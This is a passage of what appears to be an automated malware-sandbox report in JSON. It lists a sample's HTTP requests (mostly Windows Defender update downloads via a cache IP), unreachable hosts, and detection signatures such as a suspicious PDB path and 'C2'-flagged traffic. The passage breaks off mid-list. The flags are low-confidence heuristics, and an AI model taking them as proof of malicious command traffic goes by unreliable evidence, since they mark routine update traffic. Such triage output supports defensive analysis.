"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.12\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196506.689561
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=184025088-184549375\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.13\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196511.930116
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=141557760-142606335\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.14\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196513.61488
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=186646528-187695103\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.15\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196518.467336
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=49283072-50331647\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.16\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196527.801806
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=88080384-89128959\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.17\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196530.808472
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=67108864-68157439\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.18\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196534.916552
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=69206016-70254591\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.19\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196540.195875
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=174063616-175112191\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.20\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196544.222606
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=158334976-159383551\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.21\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196549.495739
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=117440512-118489087\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.22\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196552.368131
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=188743680-189792255\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.23\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196558.853297
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=9437184-10485759\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.24\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196560.939378
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=2097152-3145727\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.25\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196567.906336
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=10485760-11534335\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.26\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196569.393942
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=85983232-87031807\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.27\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196578.651445
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=34603008-35651583\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.28\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196583.388901
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=167772160-168820735\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.29\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196589.177163
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=78643200-79691775\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.30\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196595.20742
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=38797312-39845887\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.31\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196600.930515
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=13631488-14680063\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.32\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196604.848249
},
{
"count": 1,
"host": "14.102.231.204",
"port": 80,
"data": "GET /c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nRange: bytes=201326592-202375167\r\nUser-Agent: Microsoft-Delivery-Optimization/10.0\r\nMS-CV: fnvG3Tym6ka/nxlZ.2.0.0.10.2.7.1.1.33\r\nContent-Length: 0\r\nHost: 14.102.231.204\r\n\r\n",
"uri": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"body": "",
"path": "/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com",
"user-agent": "Microsoft-Delivery-Optimization/10.0",
"version": "1.1",
"method": "GET",
"first_seen": 1763196611.138772
}
],
"dns": [],
"smtp": [],
"irc": [],
"dead_hosts": [
[
"199.232.210.172",
80
],
[
"184.24.98.54",
443
],
[
"150.171.28.12",
443
],
[
"135.232.92.34",
443
],
[
"23.209.193.217",
443
],
[
"23.62.41.126",
443
],
[
"72.153.5.137",
443
],
[
"23.218.90.51",
443
],
[
"23.58.95.152",
443
],
[
"199.232.210.172",
443
],
[
"72.153.5.129",
443
],
[
"52.109.44.110",
443
]
]
}
|
{}
|
[
{
"name": "stealth_network",
"description": "Network activity detected but not expressed in monitor API logs",
"categories": [
"stealth"
],
"severity": 1,
"weight": 1,
"confidence": 100,
"references": [],
"data": [
{
"ip": "52.109.44.110"
},
{
"ip": "72.153.5.129"
},
{
"ip": "23.218.90.51"
},
{
"ip": "72.153.5.137"
},
{
"ip": "23.62.41.126"
},
{
"ip": "23.209.193.217"
},
{
"ip": "135.232.92.34"
},
{
"ip": "150.171.28.12"
},
{
"ip": "184.24.98.54"
},
{
"ip": "199.232.210.172"
},
{
"ip": "23.58.95.152"
},
{
"ip": "23.58.95.138"
},
{
"ip": "13.107.246.48"
},
{
"ip": "20.190.146.38"
},
{
"ip": "104.91.59.106"
},
{
"ip": "104.91.59.130"
},
{
"ip": "14.102.231.204"
},
{
"ip": "23.38.50.202"
},
{
"ip": "52.123.129.14"
},
{
"ip": "23.212.254.112"
},
{
"ip": "104.46.162.226"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_cnc_http",
"description": "HTTP traffic contains suspicious features that may be indicative of malware-related traffic",
"categories": [
"network",
"c2"
],
"severity": 2,
"weight": 1,
"confidence": 30,
"references": [],
"data": [
{
"ip_hostname": "HTTP connection was made to an IP address rather than domain name"
},
{
"suspicious_request": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"suspicious_request": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_http",
"description": "Performs some HTTP requests",
"categories": [
"network"
],
"severity": 2,
"weight": 1,
"confidence": 30,
"references": [],
"data": [
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "static_pe_pdbpath",
"description": "The PE file contains a suspicious PDB path",
"categories": [
"static"
],
"severity": 2,
"weight": 1,
"confidence": 80,
"references": [
"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
],
"data": [
{
"anomaly": "the PDB path contains a reference to a development path or term that may suggest development/compilation in a non-enterprise environment"
},
{
"pdbpath": "C:\\Users\\lengo\\Desktop\\Spamming Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_questionable_http_path",
"description": "Makes a suspicious HTTP request to a commonly exploitable directory with a questionable file extension",
"categories": [
"network"
],
"severity": 3,
"weight": 1,
"confidence": 100,
"references": [],
"data": [
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
},
{
"url": "http://14.102.231.204/filestreamingservice/files/a12f8523-7037-48b9-aaa7-73346b7380ac?P1=1763736695&P2=404&P3=2&P4=bIBIfS2rcYDybCt1Pos2qKRm307nN5GoD%2bzT5pUN2ITzpm4xSmEbFQEeg4z2YW5wWgNp%2bm40b6S8fLGuj07XzQ%3d%3d&cacheHostOrigin=msedge.b.tlu.dl.delivery.mp.microsoft.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
